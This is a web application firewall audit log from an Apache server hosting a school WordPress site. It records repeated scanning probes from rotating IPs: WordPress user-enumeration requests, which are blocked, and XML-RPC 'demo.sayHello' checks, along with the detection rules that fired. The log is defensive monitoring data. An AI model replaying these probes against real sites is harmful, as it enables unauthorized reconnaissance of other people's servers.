Intercepted (phase 2) Stopwatch: 1747437803836463 2820 (- - -) Stopwatch2: 1747437803836463 2820; combined=1243, p1=423, p2=789, p3=0, p4=0, p5=31, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e3808525-Z-- --8b2d765a-A-- [17/May/2025:06:23:30 +0700] aCfI8nyxdQCiyU1ENFcmVAAAABc 103.236.140.4 42096 103.236.140.4 8181 --8b2d765a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.95.116 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.95.116 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8b2d765a-C-- demo.sayHello --8b2d765a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8b2d765a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747437810512660 5738 (- - -) Stopwatch2: 1747437810512660 5738; combined=4209, p1=557, p2=3386, p3=30, p4=35, p5=120, sr=76, sw=81, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8b2d765a-Z-- --e9d74b51-A-- [17/May/2025:06:30:26 +0700] aCfKkgTOsBn9MSWb6WJt1AAAAIc 103.236.140.4 42154 103.236.140.4 8181 --e9d74b51-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.236 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.236 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e9d74b51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e9d74b51-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747438226772698 2830 (- - -) Stopwatch2: 1747438226772698 2830; combined=1235, p1=422, p2=783, p3=0, p4=0, p5=30, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e9d74b51-Z-- --ba032d5b-A-- [17/May/2025:06:30:33 +0700] aCfKmem4kjNN-hEbWjJAfQAAAEs 103.236.140.4 42158 103.236.140.4 8181 --ba032d5b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.236 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.236 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ba032d5b-C-- demo.sayHello --ba032d5b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ba032d5b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747438233465156 4927 (- - -) Stopwatch2: 1747438233465156 4927; combined=3754, p1=474, p2=3080, p3=23, p4=25, p5=90, sr=69, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ba032d5b-Z-- --58d9c024-A-- [17/May/2025:06:35:20 +0700] aCfLuOm4kjNN-hEbWjJAgAAAAFE 103.236.140.4 42176 103.236.140.4 8181 --58d9c024-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.175.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.175.141 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --58d9c024-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --58d9c024-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747438520880244 3135 (- - -) Stopwatch2: 1747438520880244 3135; combined=1349, p1=494, p2=821, p3=0, p4=0, p5=34, sr=139, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --58d9c024-Z-- --3498cc18-A-- [17/May/2025:06:35:25 +0700] aCfLvRKi5m5upc8uMd6hqAAAAMA 103.236.140.4 42180 103.236.140.4 8181 --3498cc18-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.175.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.175.141 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3498cc18-C-- demo.sayHello --3498cc18-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3498cc18-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747438525842343 4484 (- - -) Stopwatch2: 1747438525842343 4484; combined=3502, p1=420, p2=2889, p3=23, p4=23, p5=87, sr=65, sw=60, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3498cc18-Z-- --fd1c5b59-A-- [17/May/2025:06:35:42 +0700] aCfLzhKi5m5upc8uMd6hqwAAAMQ 103.236.140.4 42186 103.236.140.4 8181 --fd1c5b59-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.162.199 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.162.199 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fd1c5b59-C-- demo.sayHello --fd1c5b59-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fd1c5b59-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747438542606163 6402 (- - -) Stopwatch2: 1747438542606163 6402; combined=4588, p1=574, p2=3774, p3=38, p4=41, p5=96, sr=75, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fd1c5b59-Z-- --41b10c76-A-- [17/May/2025:06:40:21 +0700] aCfM5em4kjNN-hEbWjJAggAAAFQ 103.236.140.4 42220 103.236.140.4 8181 --41b10c76-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.76.190 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.76.190 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --41b10c76-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --41b10c76-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747438821683195 3360 (- - -) Stopwatch2: 1747438821683195 3360; combined=1426, p1=488, p2=904, p3=0, p4=0, p5=33, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --41b10c76-Z-- --9d46d846-A-- [17/May/2025:06:40:27 +0700] aCfM6-m4kjNN-hEbWjJAhAAAAFc 103.236.140.4 42224 103.236.140.4 8181 --9d46d846-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.202.76.190 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.76.190 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9d46d846-C-- demo.sayHello --9d46d846-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d46d846-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747438827836548 4803 (- - -) Stopwatch2: 1747438827836548 4803; combined=3683, p1=423, p2=3055, p3=22, p4=24, p5=93, sr=64, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d46d846-Z-- --0f7cd31c-A-- [17/May/2025:06:41:24 +0700] aCfNJOm4kjNN-hEbWjJAhgAAAEI 103.236.140.4 42228 103.236.140.4 8181 --0f7cd31c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.201.10.17 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.10.17 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0f7cd31c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0f7cd31c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747438884839316 2953 (- - -) Stopwatch2: 1747438884839316 2953; combined=1291, p1=429, p2=832, p3=0, p4=0, p5=30, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0f7cd31c-Z-- --fc4e7633-A-- [17/May/2025:06:41:30 +0700] aCfNKgTOsBn9MSWb6WJt2wAAAJQ 103.236.140.4 42236 103.236.140.4 8181 --fc4e7633-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.201.10.17 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.10.17 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fc4e7633-C-- demo.sayHello --fc4e7633-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fc4e7633-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747438890100045 5935 (- - -) Stopwatch2: 1747438890100045 5935; combined=4350, p1=585, p2=3539, p3=32, p4=36, p5=94, sr=81, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fc4e7633-Z-- --d68b5408-A-- [17/May/2025:07:05:01 +0700] aCfSrXyxdQCiyU1ENFcmdQAAAA4 103.236.140.4 42358 103.236.140.4 8181 --d68b5408-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.240.99.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.240.99.163 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d68b5408-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d68b5408-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747440301283075 2929 (- - -) Stopwatch2: 1747440301283075 2929; combined=1325, p1=456, p2=837, p3=0, p4=0, p5=32, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d68b5408-Z-- --20ea895c-A-- [17/May/2025:07:05:07 +0700] aCfSs3yxdQCiyU1ENFcmdwAAABM 103.236.140.4 42362 103.236.140.4 8181 --20ea895c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.240.99.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.240.99.163 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --20ea895c-C-- demo.sayHello --20ea895c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --20ea895c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747440307740796 5859 (- - -) Stopwatch2: 1747440307740796 5859; combined=4404, p1=619, p2=3378, p3=29, p4=30, p5=189, sr=160, sw=159, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --20ea895c-Z-- --ceb25f45-A-- [17/May/2025:07:05:10 +0700] aCfStnyxdQCiyU1ENFcmeAAAABQ 103.236.140.4 42364 103.236.140.4 8181 --ceb25f45-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.82.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.82.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ceb25f45-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ceb25f45-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747440310767447 3356 (- - -) Stopwatch2: 1747440310767447 3356; combined=1422, p1=493, p2=886, p3=0, p4=0, p5=42, sr=92, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ceb25f45-Z-- --8eeafc36-A-- [17/May/2025:07:05:13 +0700] aCfSuXyxdQCiyU1ENFcmewAAAAA 103.236.140.4 42370 103.236.140.4 8181 --8eeafc36-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.75.152 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.75.152 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8eeafc36-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8eeafc36-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747440313044302 2034 (- - -) Stopwatch2: 1747440313044302 2034; combined=1042, p1=320, p2=695, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8eeafc36-Z-- --d3e7904d-A-- [17/May/2025:07:05:16 +0700] aCfSvHyxdQCiyU1ENFcmfAAAABc 103.236.140.4 42372 103.236.140.4 8181 --d3e7904d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.82.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.82.64 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d3e7904d-C-- demo.sayHello --d3e7904d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d3e7904d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747440316209828 5705 (- - -) Stopwatch2: 1747440316209828 5705; combined=4188, p1=551, p2=3398, p3=31, p4=36, p5=101, sr=78, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d3e7904d-Z-- --37c9e278-A-- [17/May/2025:07:05:18 +0700] aCfSvnyxdQCiyU1ENFcmfgAAAAM 103.236.140.4 42376 103.236.140.4 8181 --37c9e278-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.75.152 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.75.152 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --37c9e278-C-- demo.sayHello --37c9e278-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --37c9e278-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747440318629733 4368 (- - -) Stopwatch2: 1747440318629733 4368; combined=3473, p1=404, p2=2875, p3=23, p4=24, p5=87, sr=67, sw=60, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
